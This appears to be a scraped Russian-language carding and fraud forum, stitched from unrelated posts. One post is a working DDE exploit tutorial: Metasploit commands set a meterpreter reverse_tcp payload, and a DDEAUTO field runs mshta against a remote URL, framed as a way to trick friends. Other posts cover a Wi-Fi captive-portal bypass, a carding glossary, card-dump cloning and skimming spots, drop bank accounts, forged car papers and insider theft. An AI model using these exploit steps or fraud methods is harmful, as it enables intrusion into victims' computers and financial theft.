Таблица лидеров

Дошло , был рад сотрудничать

Транш на 5000$ прошел успешно , дерзайте , только не забывайте про гаранта

Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.

Хорошая статья !)

кажется,я где то это уже видел

Я думаю у каждого бывало, что трафик закончился, подключаешься к бесплатному вайфаю и просит ввести номер и получить смс. А номер не всегда хочется палить, тем более бывает что потом спам присылают) А халявного интернета то хочется. Что же делать? Большинство таких авторизаций основаны на подмене IP-адресов на уровне DNS. Грубо говоря сначала направляют тебя на отдельный сервер, где надо авторизоваться, а потом уже сможешь пользоваться интернетом как обычно. Обойти это довольно просто, достаточно заменить DNS этого сервера на днс от гугла 8.8.8.8 и 8.8.4.4. и всё заработает. Объясню как это сделать на андроиде и на айфоне. Для андроида это делается так: Заходим в список сетей, зажимаем нужную, выбираем «Изменить сеть», дальше выбираем «Расширенные настройки», в поле Настройки IP выбираем Пользовательские (или Статический). После этого появятся поля для днс, пишем туда 8.8.8.8 и 8.8.4.4, сохраняем и перезапускаем вайфай. На айфоне все похоже. Заходим в настройки, оттуда в вайфай, нажимаем кнопку i справа от нужной сети, и в поле днс пишем 8.8.8.8 и 8.8.4.4 и сохраняем. Чаще всего это помогает и можно обойти авторизацию и сидеть в интернете не спалив свой номер)

Не так давно видео ютубе на эту тему смотрел

Подниму

Даже по "тупым" схемам, прейдется платить как минимум дропам и по личному опыту знаю, что берут около десятки за 1 ИП

Да, анонимность в наше время очень редкая и важная штука ...

Открываю, человек действительно может все, о чем говорит, единственное , не смогли найти дропа для удаления судимости Администрация форума настоятельно рекомендует проводить все сделки через гарант-сервис!

Оформил мне доки на спизженную машину Это фиаско братан

Забавно, осталось только 150к где то добыть

Дикое наебалово всех продавцев просто и все

Ну что вам сказать, ТОП просто ТОП Ни капли не жалею, что купил Выхлопы дикие , тех поддержка 24\7 до сих пор, хотя уже месяц прошел со дня покупки

На твою карту сегодня залились бабосы, спасибо еще раз

а что в этом такого то, просто из рук в руки точно не передашь, а найти карту закладкой вообще не проблема

Смысл тут тем , которые будут по 50$ стоить , это же не форум нищебродов

Ехууу, еду с почты ! Забрал посылочку , щас думаю зачем 6 заказывал лучше бы 7 взял, сэкономил епт)

Благодарю гарант за проведение сделки. Сегодня до скольки на связи, сейчас если что еще одну сделку провести хочу

Фуф, спасибо! Ожидаю посылки теперь ))

Имеюю свой дроп проект,имею около 10 разных счетов в банках USA!Если заинтересовала пиши

Спасибо большое за инфу. интересно знать) бро можно поинтересоваться? я ничего не отключал. сидя через впн перешел по твоей ссылке.он показал ip впн. ровно?

Отличная статья.Ставлю +!

Чиновники считают, что кибератака была организована специалистами из Китая. Хакеры в очередной раз совершили кибератаку на сервер одного из федеральных ведомств США и получили доступ к персональным данным сотрудников американской разведки и военных, которые те предоставили для получения доступа к секретной информации. Кроме личных данных в руки хакеров попали также списки контактов родственников военных, что, по мнению чиновников, может быть использовано для давления на них. По данным СМИ, всего в руки хакеров попали данные более чем 14 миллионов человек. Американские чиновники заявили, что кибератака была проведена с территории КНР. Напомним, ранее хакерам удалось получить доступ к персональным данным бывших и действующих чиновников федеральных ведомств США. Тогда кибератаке подверглись базы данных управления по персоналу федерального правительства. Отметим, что в этой атаке чиновники также подозревают китайских специалистов. Однако власти КНР полностью отрицают это.

Похоже меня услышали) Спасибо тебе добрый человек!

Спасибо) Буду пробовать

прозвон со своего можно делать?или тоже левый номер нужен?

Новейший сервис и очень полезный,на вашем броде только видел такой.Обязательно воспользуюсь если найду куда бенз сплавить :wink:

Пожалуйста скинь если есть шабы с СС

Мужики ну кто что скажет по счет РБК)

в дажбее что не отвечаешь пишу пишу,а ты молчишь

ABA Routing Number – уникальное девятизначное число, обычно ставится в нижней части чека перед номером счета (обрамленное двоеточиями). Позволяет однозначно определить банк, где находится сумма, на которую выписан чек. Acquirer (Acquiring Bank) – банк или финансовая организация, осуществляющая весь спектр операций по взаимодействию с точками обслуживания банковских карт, которая состоит из терминалов в торгово-сервисной сети и банкоматов. При получении данных о произведенных операциях в сети, эквайрер направляет их в систему для проведения соответствующих расчетов. Эквайрер отвечает за возмещение средств торговым точкам, в которых производились покупки или оплачивались услуги с помощью карт. Address Verification Service (AVS) – операция проверки адреса, куда поступает счет за приобретенный товар. Approval - подтверждение, код, посылаемый банком-эмитентом в подтверждение того, что пластиковая карта покупателя существует, пригодна к пользованию и запрашиваемая сумма находится в пределах допустимого лимита. Подтверждение запрашивается в процессе операции авторизации. Automated Teller Machine (ATM) – устройство, предназначенное для получения наличных по пластиковой/smart-карте. Authorization – авторизация, требование оплаты. Процесс авторизации блокирует деньги на счету, уменьшая свободную для расходования сумму. Чтобы осуществить снятие денежных средств, необходимо завершить процесс авторизации. Если за время, которое определяется эмитентом, процесс авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для расходования. Authorization Code - код авторизации. Код, состоящий из букв и цифр, посылаемый банком-эмитентом (Сard Issuer), подтверждающий авторизацию. Код авторизации обязательно включается в чек (Sales Draft), выписываемый продавцом. Bank Identification Number (BIN) - цифры на пластиковой карте, однозначно определяющие банк-эмитент (Issuing Bank). Обычно это первые шесть цифр, которые часто называют бином. Batch - набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день. Batch можно завершить как автоматически, так и с помощью POS-терминала. Batch Processing - тип обработки данных, при котором определенная совокупность транзакций обрабатывается единовременно. Billing Address – фактически адрес, на который поступает счет за приобретенный товар. Capture - решение, о представлении определенной транзакции к оплате. Все транзакции, представленные к оплате, включаются в Batch и направляются процессору платежей или платежному шлюзу. Сard Issuer – организация, ответственная за выпуск и обслуживание пластиковых карт. Card-Not-Present – ситуация, когда продавец не имеет возможности видеть покупателя, и ему физически недоступна пластиковая карта, то есть он не имеет возможности считать информацию с магнитной полосы, проверить подпись, посмотреть голограмму и т.п. Чтобы повысить надежность оплаты в этом случае используется система Address Verification Service. Card Unblocking - операция обратная блокированию (Card Blocking). Certification Authority - организация, которой доверено выдавать сертификаты открытых ключей. Chargeback – операция возврата платежа. Сумма, которую вычитают со счета продавца по требованию владельца пластиковой карты. Если признана правота владельца карты, у продавца со счета вычитают сумму платежа плюс комиссию за ChargeBack (Chargeback Fee). Операция ChargeBack инициируется эмитентом после того как эквайрер завершил транзакцию. Сhargeback Reason Code – двузначное число, которым кодируется причина возврата платежа. Check Guarantee - способ, гарантирующий оплату по чеку в пределах суммы, установленной для конкретного счета. Chip Сard – смарт-карта (также IC – integrated circuit card). Пластиковая карта, внутри которой находится микропроцессор, способный хранить «электронные деньги». Сlose Batch - передача транзакций с кодами авторизации процессору платежей с целью перевода денег на счет продавца. Commerce Server – Интернет-сервер, подключенный к процессору платежей, имеющий все необходимое для их принятия: программное обеспечение, хранящее информацию обо всех покупках и общую сумму цен, базу данных и т.д. Commerce Server обычно позволяет установить соединение по одному из защищенных протоколов, например, SSL. Confirmation Letter – электронное письмо, посылаемое продавцу процессором платежей и содержащее сведения о представленных процессору Batch-файлах. Credit Card - пластиковая карта, показывающая, что ее владельцу открыт кредит в организации-эмитенте. Это позволяет владельцу совершать покупки или получать деньги в банкомате в пределах установленного договором между держателем и эмитентом максимального лимита. Credit Card Processors (Third Party Processors) - организация, обычно нанимаемая банком-эквайером , для предоставления услуг по процессингу платежей. CVV2/CVC2 - это контрольный номер, состоящий из трех цифр, который напечатан на обратной стороне банковской карты. Данный номер отображается в верхнем правом углу специальной полсы для подписи. Ввод номера помогает убедиться, что карта используется настоящим владельцем. CVV2 классификация используется для карт VISA. CVC2 классификация используется для карт MasterCard. Debit Card – дебетовая банковская карта. В отличие от кредитной карты, суммы, потраченные покупателем, автоматически вычитаются с его счета. Для оплаты дебитной картой обычно требуется PIN Decline – операция отказа эмитента в авторизации платежа. Demand Deposit Account (DDA) – стандартный счет (checking account), куда могут быть переведены денежные средства. Deposit - момент, когда продавец формирует (закрывает) Batch-файл и посылает транзакции для завершения. Deposit Bank - банк, куда посылаются денежные средства продавца, снятые с карточных счетов покупателей. Digital Signature - цифровая подпись. Последовательность символов, получаемая методами несимметричной криптографии (Public Key Cryptography), присоединяемая к сообщению и подтверждающая его аутентичность. Digital Wallet -цифровой бумажник. Программа для оплаты товара по пластиковой карте. Перед тем как купить что-то, покупатель регистрируется в платежном шлюзе, получает имя и пароль, после чего может совершать покупку на любом web-сайте, поддерживающем данный тип цифрового бумажника. Discount Rate - процент, взимаемый банком-эквайером c продавца за каждую покупку. E-Commerce - электронная коммерция, определенный род деятельности, осуществляемый с использованием электронных средств связи. Electronic Data Interchange (EDI) - глобальная компьютерная сеть, отделенная от Интернета, используемая банками и другими финансовыми организациями для проведения платежей. Electronic Data Capture - использование POS-терминала для авторизации и передачи транзакций процессору банковских карт или иному MAP. Роль POS-терминала может играть специальная программное обеспечение или платежный шлюз (Payment Gateway). Electronic Cash Register (ECR)- электронный кассовый аппарат, другими словами, комбинация кассового аппарата и POS-терминала. Часто ECR - это программное приложение, установленное на персональном компьютере Electronic Draft Capture (EDC) - система, в которой транзакции передаются из разных мест на центральный компьютер (Host Computer ) для хранения и обработки. Накопленные за период транзакции затем передаются процессору платежей. Electronic Money (e-money) - цифровая наличность. Хранится в электронном виде в компьютерах или микропроцессорах. Находится в распоряжении покупателя. Цифровая наличность может быть куплена и сохраняться в специальном накопительном устройстве. Electronic Purse – smart-карта, на которой хранится цифровая наличность (e-money). EMV-specification – единые международные требования к микропроцессорным карточкам, описывающие требования к карточке, терминалу и процессу обмена информацией между карточкой и терминалом. Factoring - ситуация, когда собственный номер идентификации предприятия торговли/услуг в платежной системе (Merchant Account) используется для приема платежей за дополнительную комиссию для нужд другого продавца. Данная деятельность считается нелегальной. Floor Limit - если цена товара ниже Floor Limit, продавец может обойтись без авторизации (убедившись, что карта не помещена в список потерянных или украденных). Floor Limit обычно устанавливается эмитентом. Front-End – информация, которую видит покупатель на web-сайте продавца. Front-End позволяет покупателю взаимодействовать с электронной корзиной, базой данных, а также оплачивать покупки. Holdback (Reserve Account) - часть средств, полученных продавцом от карточных платежей, блокируемая эквайрером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу. Host Capture - автоматическое составление Batch-файла в процессоре платежей или платежном шлюзе. Host Computer -компьютер, осуществляющий авторизацию и завершение. Imprint - считывание параметров карты. Может быть электронным (через POS-терминал) или ручным (получение оттиска карты с помощью импринтера). Imprint необходим для доказательства физического присутствия карты в месте покупки. Interchange - поток информации между эмитентом и эквайрером, например, транзакции, возврат и т.д. Interchange Fee – комиссия, которую платит банк-эквайрер банку-эмитенту за каждую операцию перевода с банковской карты. Данная комиссия является частью Discount Fee. ISO (Independent Service Organization) – организация, помогающая продавцу принимать платежи по пластиковым картам. Прежде чем работать с ISO продавцы должны, как правило, уже иметь открытый Merchant Account. Issuer (Issuing Bank) -эмитент, банк, выпускающий банковские карты и открывающий карточные счета для физических и юридических лиц. Key -ключ, набор цифр, используемый в криптографическом алгоритме. Key length - длина ключа (Key), измеряемая в битах. Limited-purpose prepaid card - смарт-карта, которую можно использовать только в строго определенных точках продаж товаров или услуг. Load – операция по загрузке цифровой наличности в цифровой кошелек. Load Log – запись о последней загрузке цифровой наличности в цифровой кошелек. Local Review – способность продавца видеть со своего терминала или ECR содержимое Batch-файла до или после завершения транзакции. Locking (Card Blocking) - блокирование smart-карты, предотвращающее ее дальнейшее использование. Magnetic Stripe – магнитная полоса. Располагается с обратной стороны пластиковой карты и содержит в закодированном виде информацию о карточном счете, связанном с данной картой. Manual Entry (Keyed Entry) – операция ручного ввода параметров карты с клавиатуры компьютера или POS-терминала. Member - финансовое учреждение - член ассоциации международной платежной системы. Merchant – юридическое лицо, принимающее платежи по пластиковым картам. Merchant Account - уникальный номера идентификации предприятия торговли/услуг в платежной системе, который позволяет принимать платежи по банковским картам. Регистрируя Marchant Account, банк соглашается оплачивать предприятию торговли/услуг правильно совершенные сделки (покупки) в обмен на снятие средств со счетов покупателей в банках-эмитентах. Merchant Account Provider (MAP) - организация, открывающая Merchant Account. Merchant Agreement - письменное соглашение между продавцом и банком (возможно, между продавцом, банком и ISO), устанавливающее права, обязанности и гарантии сторон в процессе приема карточных платежей. Merchant Bank -банк, в котором открыт Merchant Account. Merchant Category Code - код, который банк-эквайрер присваивает продавцу. Данный код, обычно состоящий из четырех цифр и называемый иногда Sic Code, отражает основное направление деятельности продавца. Micropayment – микроплатеж, очень маленькая сумма, возможно, меньше цента. MID (Merchant Identification Number) – число, однозначно определяющее продавца в платежной системе. Monthly Minimum – минимальная месячная плата, которую удерживают с продавца за прием платежей по пластиковым картам. MOTO Discount Rate (Mail Order / Telephone Order) - комиссия, которая удерживается эквайрером с каждой транзакции в случае, когда продавец не имеет доступа к самой карте, зная лишь ее параметры, сообщаемые ему по телефону, факсу или Интернету. Non-Qualified – обозначение транзакции, характеризующейся повышенным риском (например, в с случае, когда транзакция осуществляется с помощью передачи параметров банковской карты при физической невозможности доступа к ней). Off-line – обозначение состояния системы, когда между участниками платежной системы нет непосредственной связи. On-line – обозначение состояния системы, когда перед выполнением транзакции идет соединение с центральным компьютером для авторизации в режиме реального времени. Open To Buy - размер кредита, доступного в данный момент владельцу карточного счета Payment Gateway – платежный шлюз. Обычно Интернет-сервер с установленным на нем программным обеспечением, вязывающим web-сервер продавца с процессором платежей. Payment System - платежная система. Набор банковских процедур и систем межбанковского перевода денежных средств. Pc Pos Application – компьютерная программное приложение, которая объединяет любые две функции из списка: кассовый аппарат, учет ценностей, бухгалтерская программа, программа для авторизации и приема платежей по кредитным картам. PIN (Personal Identification Number) – цифровой или алфавитно-цифровой код, доступный лишь владельцу карты. Используется при операциях с карточным счетом, привязанном к данной банковской карте. POS Terminal (Point of Sale) – электронный прибор, используемый для авторизации и проведения платежей по банковской карте. Post Authorization - транзакция, которой предшествует голосовая авторизация. Prepaid card – smart-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты. Prior Authorized Sale – транзакция, для которой сначала проводится авторизация. Продавец авторизует карту, прежде чем предоставить продукт/услугу. Private Key – секретный ключ, доступ к которому должен иметь только его владелец. Секретному ключу соответствует открытый ключ. Processor – процессор платежей, компьютерный центр, производящий операции по обработке платежей по банковским картам Public Key - открытый ключ, несекретная часть пары двух ключей в асимметричной криптографии Public Key Certificate –сертификат открытого ключа. Информация об открытом ключе, как правило, включающая сам ключ, подписанная цифровой подписью физического лица или организации. Сертификат защищает целостность ключа, если человек или организация, подписавшие его, хорошо известны, а их открытые ключи широко распространены.

После долгих затяжных работ,мы наконец полностью восстановились.Извиняемся за столь длительный период,почти целый год лежал форум.НУ что начнем новую жизнь)Желаю нашему проекту процветания,а вам дорогие пользователи огромного фарта и больших $$$). Удачи в нашем нелегком деле!)

Скидки на опт .

нужны срочно 10 карт втб или бта банка. желательно безлимитные и мин. на 3 года. приклепленные к одному счету. цена? условия и сроки?

Здравствуйте. Я первый раз на форуме. Хочу поинтересоваться у вас есть ли смысл и возможность купить енкодер, купить здесь же дампы, залить на карты и спокойно шопиться? Если да, мог бы кто-нибудь провести ликбез по данной тематике. Понимаю, вопрос адский, но давайте воздержимся от глумного флуда и бросания камней в новичков. Спасибо

Мне тоже кажется, что продавать помещение под ресторан лучше в черновом варианте, мало ли какая у них окажется концепция заведения, вдруг они увидят ресторан совсем не так, как вы.

Вижу тут человека который шарит :wink:

если логически подойти к вопросу - в любом месте где прокатывают карту... В барах, ресторанах, клубах, ну и магазах где оплачивают картой... Соответственно нужно что бы небыло камер, ну или если есть возможность - искать "мертвые зоны" от тех же самых камер (это в случае клубов итп).

корофко рулит) а впускают на сайт только по сертификату :mad:

ищи телку, пусть поговорит с ним без камеры, или заплати за прием звонка) гавное заинтересовать его на общение, потом будет кидать на мобилу

Дамп не читает на сколько мне известно. Вообще дайте не много времени и я постараюсь выложить статью здесь об устройстве, что читает как читает и тд. На сегодняшний день знаю лишь что читается там карта (данные вида номер+имя), на счет цвв еще вопрос, на счет дампа тоже пока сомневаюсь.

-($)BANKIR($)-, фактически ничего тебе не дабавят, у каждого файла есть дата создания и не в их интересах фальцифицировать улики, за такие проделки менты могут снять погоны

интересует старый образец. Есть пару вопросов - адресовал в личку.

VERTU мы это учтем!

НА ПОСТОЯННОЙ ОСНОВЕ НУЖНЫ КРУПНЫЕ ЗАЛИВЫ НА БИЛАЙН.ПРЕДЛОЖЕНИЯ В ПМ ИЛИ АСЮ 389936555

Ага-ага статус повесите удалюсь с форума нах вашего

возбуждено-то будет, но х.. что докажут. Доказать мошенничество подобного рода практически не возможно, если только сам языком не разбалтает

А конкретно тебе никто и не скажет, люди делают деньги, если все начнут делать на этом деньги - баг найдут и устранят... Сколько случаев я знаю, например сидит оператор и по тихой сливает бабки со счетов клиентов опсоса, ну например по 1-2р, потом по 10, а потом находит тех у кого баланс например 250 000р насотовом, ну и мысли появляются, а возьму ка я сотку, не лучше шт уку, один хер у него их 250, он и не заметит, а потом терпила приходит к администрации и говорит что у него спиздили деньги, всё заканчивается судимостью! Жадность фраера, ну дальше вы знаете... Поэтому ищите свои способы, открывайте новые направления фрикинга!